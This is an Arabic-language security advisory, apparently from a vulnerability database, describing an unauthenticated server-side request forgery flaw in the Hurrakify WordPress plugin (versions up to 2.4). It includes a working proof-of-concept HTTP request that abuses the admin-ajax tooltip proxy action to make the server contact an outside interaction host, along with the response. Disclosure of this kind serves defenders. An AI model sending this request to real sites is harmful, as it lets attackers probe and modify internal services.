
Hurrakify <= 2.4 - تزوير الطلبات من جانب الخادم بدون مصادقة
Hurrakify <= 2.4 - تزوير الطلبات من جانب الخادم بدون مصادقة
إن إضافة Hurrakify لـ WordPress معرضة لثغرة تزوير الطلبات من جانب الخادم (Server-Side Request Forgery) في جميع الإصدارات حتى الإصدار 2.4 وما يشمل ذلك. وهذا يتيح للمهاجمين غير المصادق عليهم إرسال طلبات ويب إلى مواقع عشوائية تنطلق من تطبيق الويب، والتي يمكن استخدامها للاستعلام عن المعلومات من الخدمات الداخلية وتعديلها.
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>